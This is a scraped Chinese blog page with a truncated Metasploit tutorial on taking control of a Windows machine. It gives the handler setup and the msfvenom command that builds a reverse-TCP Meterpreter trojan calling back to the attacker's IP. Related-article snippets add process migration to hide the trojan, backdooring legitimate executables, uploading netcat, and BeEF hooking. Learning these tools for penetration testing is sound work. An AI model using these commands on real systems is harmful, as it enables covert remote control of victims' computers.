msf 获取一个普通的session 控制windows

最新推荐文章于 2025-03-13 00:00:00 发布

营长s

最新推荐文章于 2025-03-13 00:00:00 发布

阅读量2.8k

点赞数 1

CC 4.0 BY-SA版权

分类专栏： metasploit

本文链接：https://blog.csdn.net/weixin_44286136/article/details/115865976

msf 获取session

在kali终端中打开msfconsole控制台
开启监听
use exploit/multi/handler
设置tcp监听
set payload windows/meterpreter/reverse_tcp

在这里插入图片描述
再次开启一个终端进行（shift+ctrl+T）,查看本机ip
利用msfvenom制作木马程序
说明：-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的，可以返回shell
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-f exe 生成exe格式

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.27.7.10 lport=4444 -f exe >/tmp/hack.exe

在这里插入图片描述
将木马传到目标主机
这里使用python -m SimpleHTTPServer 800搭建一个http服务，提供一个文件浏览的web页面到800端口

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

营长s

关注关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

msf拿下windows的远程桌面

mulincong的博客

05-25

1057

msf拿下windows的远程桌面

kali中使用msf制作Windows恶意软件获取shell

weixin_43894771的博客

03-09

1250

1.1制作Windows恶意软件获取shell 后门的生成是为了更好的理解渗透过程中的方法以及途径，进而达到更好的防护，而不是利用技巧去做攻击等不合理的行为思路就是利用社会工程学中人的心理，去为某些软件利用msf生成一些后门程序，进而通过带有后门的软件实现渗透获取shell 1.1.1生成西瓜影音.exe后门程序 1.1.2在MSF上启动handler开始监听后门程序 1.1.3在Kali上...

参与评论您还未登录，请先登录后发表或查看评论

MSF中sessions命令使用

qq_44624916的博客

11-28

6919

MSF使用

msf获取session后

weixin_50683638的博客

04-28

537

进程迁移： ps 获取进程 getpid shell的进程号 migrate 迁移 run post/windows/manage/migrate 自动迁移 shell之后： sysinfo 获取系统信息 run post/windows/gather/checkvm 查看目标是否允许在虚拟机 idletime 最近运行的时间 route 查看目录完整网络 getuid 当前用户名 run post/windows/manage/kil

msf 获取session 之后

weixin_30460489的博客

12-10

1809

进程迁移： ps 获取进程 getpid shell的进程号 migrate 迁移 run post/windows/manage/migrate 自动迁移 shell之后： sysinfo 获取系统信息 run post/windows/gather/checkvm 查看目标是否允许在虚拟机 ...

msf~~~

Augmentum-Casper的专栏

11-09

787

如果有人问我msf和天书有什么区别么~~我会非常肯定的告诉他"NO"~~~~

msf学习笔记

qq_48257021的博客

12-20

1352

SMB(服务器消息快):TCP445、NBT间接用TCP139接收数据，MS10-012、MS10-054 MSRPC(微软远程过程调用):TCP139、445，MS05-039、MS09-026、-e, –encoder [encoder] 指定需要使用的encoder（编码器）,指定需要使用的编码，如果既没用-e选项也没用-b选项，则输出raw payload。-t exe -x /root/正常.exe -o 1213.exe -e x86/shikata_ga_nai -k -c 20。

使用kali中msf制作一个网页链接点击后获取定位

最新发布

07-12

但是，请注意，Metasploit本身并没有一个专门的模块来生成一个仅用于获取定位的链接。通常，获取定位需要先获得一个Meterpreter会话，然后通过后期利用模块或脚本获取位置信息。因此，我们可以设计一个攻击流程...

Windows提权---MSF/令牌窃取/系统服务权限配置错误提权

qq_40012781的博客

07-02

2505

提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升

利用beef和msf实现session远程命令

居上

10-24

689

笔记beef启动 beef 的方法msf beef 工具目录 /usr/share/beef-xss 配置文件 config.yaml 启动 beef 的方法 1.beef-xss 2./usr/share/beef-xss/beef (使用前需要修改默认的用户名称和密码) Web 管理界面 http://127.0.0.1:3000/ui/panel Shellcode http://127.0.0.1:3000/hook.js 测试页面 http://127.0.0.1:3000/demos/butch

Metasploit（一）--Meterpreter的命令速查表

weixin_34167819的博客

08-27

1012

原文：http://www.2cto.com/Article/201311/259669.html第1步：核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...

msf（Metasploit）中Session与Channel的区别与关系解析

vortex5的博客

03-13

951

Session：表示渗透测试人员与目标系统的持续交互连接。它是高层的抽象，提供了一个稳定的环境来执行各种攻击操作。Channel：表示在会话内部的一个具体通信路径，每个Session可以包含多个Channel，用于处理不同类型的数据传输或命令执行。理解Session和Channel的区别，并掌握它们的管理技巧，将大大提高渗透测试的效率。通过会话，渗透测试人员可以与目标系统进行全面交互，而通过通道，攻击者能够高效、灵活地执行命令、传输文件和执行后渗透操作。

获得一个session会话后，可进行的命令操作

mohanhan

06-27

2210

session操作 Msf下 sessions –l 列出目前msf后台已有的session Sessions –i 1 使用id=1的seesion，并进入meterpeter Meterpreter下 background查看当前后台存在的session 以下命令皆在 meterpreter下执行进程相关功能: Ps查看进程比如木马进程1234 靶机桌面进程exploit.exe是3445 Ps 3445 就可以把木马进程注入到桌面进程，可对木马进程做隐藏 migrate 72

MSF基本使用

浅笑996的博客

11-10

2749

MSF 链接数据库 linux查找文件 find / -name dabase.yml 链接数据库 db_connect -y path/database.yml db_status 查询数据库链接状态 payload: windows/x64/meterpreter/reverse_tcp 命令（以下命令基于这个payload） background 后台 sessions...

2024年小白必学：msf基本使用_msf监听(2)，2024年最新15个经典面试问题及回答思路

2301_77121488的博客

05-11

735

网络安全很多技术干货，都可以共享给你们，如果你肯花时间沉下心去学习，它们一定能帮到你网络安全工程师学习资料包循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助，讲解通俗易懂，风趣幽默，风格清新活泼，学起来轻松自如，酣畅淋漓！如果你想要入坑黑客&网络安全工程师，这份282G全网最全的网络安全资料包！网络安全大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享👉网安（嘿客红蓝对抗）所有方向的学习路线👈对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。

Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用

Alone hackers的博客

03-06

6019

Metasploit (MSF) 使用:包含基本使用，payload生成，后渗透模块使用。

Metasploit 整理笔记

热门推荐

不急不躁

07-12

1万+

一．名词解释 exploit 测试者利用它来攻击一个系统，程序，或服务，以获得开发者意料之外的结果。常见的有内存溢出，网站程序漏洞利用，配置错误exploit。 payload 我们想让被攻击系统执行的程序，如reverse shell 可以从目标机器与测试者之间建立一个反响连接，bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只能在目标机器上

初学MSF之渗透、提权、免杀（上）

qq_53058639的博客

08-01

2430

Metasploit是一个免费的、可下载的渗透测试框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具，并且MSF团队始终在更新MSF的漏洞库，这使得MSF始终充满生机。通俗的讲，MSF就是一个集成了渗透测试全流程的渗透工具，理论上讲，我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。

msf命令行

04-01

### Metasploit Framework 命令行使用教程 #### 一、基本概念 Metasploit 是一款强大的渗透测试框架，其主要通过 `msfconsole` 提供命令行交互环境。以下是几个核心组件及其作用： - **msfconsole**: 主要接口，提供命令行界面访问和使用框架的所有功能[^1]。 - **msfvenom**: 用于生成多种格式的漏洞利用载荷 (payloads)，支持 apk、exe 和 php 等文件类型。 - **Meterpreter**: 高级 payload，允许对目标系统进行深入控制和操作。 --- #### 二、常用命令列表 ##### 1. 启动与帮助启动 msfconsole 并查看可用命令： ```bash msfconsole help ``` ##### 2. 设置模块选择并加载特定类型的模块（exploit、auxiliary、post、encoder、nop 或 payload）： ```bash use [module_name] ``` 例如，选择 TCP 端口扫描辅助模块： ```bash use auxiliary/scanner/portscan/tcp ``` 设置模块选项前可以先查看模块详情： ```bash info show options ``` ##### 3. 配置参数为所选模块配置必要参数： ```bash set RHOSTS <target_ip> set LHOST <local_ip> set PAYLOAD <payload_type> ``` 例如，设置远程主机为目标 IP 地址： ```bash set RHOSTS 192.168.1.100 ``` ##### 4. 执行模块运行当前配置好的模块： ```bash run exploit ``` ##### 5. 获得 Meterpreter Shell 成功执行 exploit 后可能获得一个 shell 或 meterpreter session： ```bash sessions -l # 查看所有会话 sessions -i <session_id> # 进入指定会话 ``` 进入会话后可上传文件到目标机器： ```bash upload /path/to/local/file /path/to/remote/directory ``` 例如，上传 nc.exe 文件至目标系统的 C:\Windows\System32 目录下[^2]: ```bash upload /usr/share/windows-binaries/nc.exe c:/windows/system32 ``` ##### 6. 使用 Msfvenom 创建 Payload Msfvenom 可独立于 msfconsole 工作，用来创建自定义 payload。以下是一个常见的 Windows reverse shell 的例子： ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_local_ip> LPORT=<port_number> -f exe > shell.exe ``` 此命令将生成一个名为 `shell.exe` 的反向连接 payload。 --- #### 三、其他实用技巧 ##### 1. 自动化脚本可以通过 Ruby 编写自定义模块或扩展现有模块的功能[^3]。例如，在选定攻击模块后调整某些参数实现更复杂的场景模拟。 ##### 2. 日志记录启用日志以便后续分析： ```bash log enable all ``` ##### 3. 更新数据库定期更新本地漏洞库以获取最新数据支持： ```bash db_nmap -sV <target_ip> searchsploit <vulnerability_keyword> ``` --- ### 结论以上介绍了如何在命令行环境下高效地运用 Metasploit Framework 完成基础任务以及部分高级特性。掌握这些技能对于开展安全评估工作至关重要。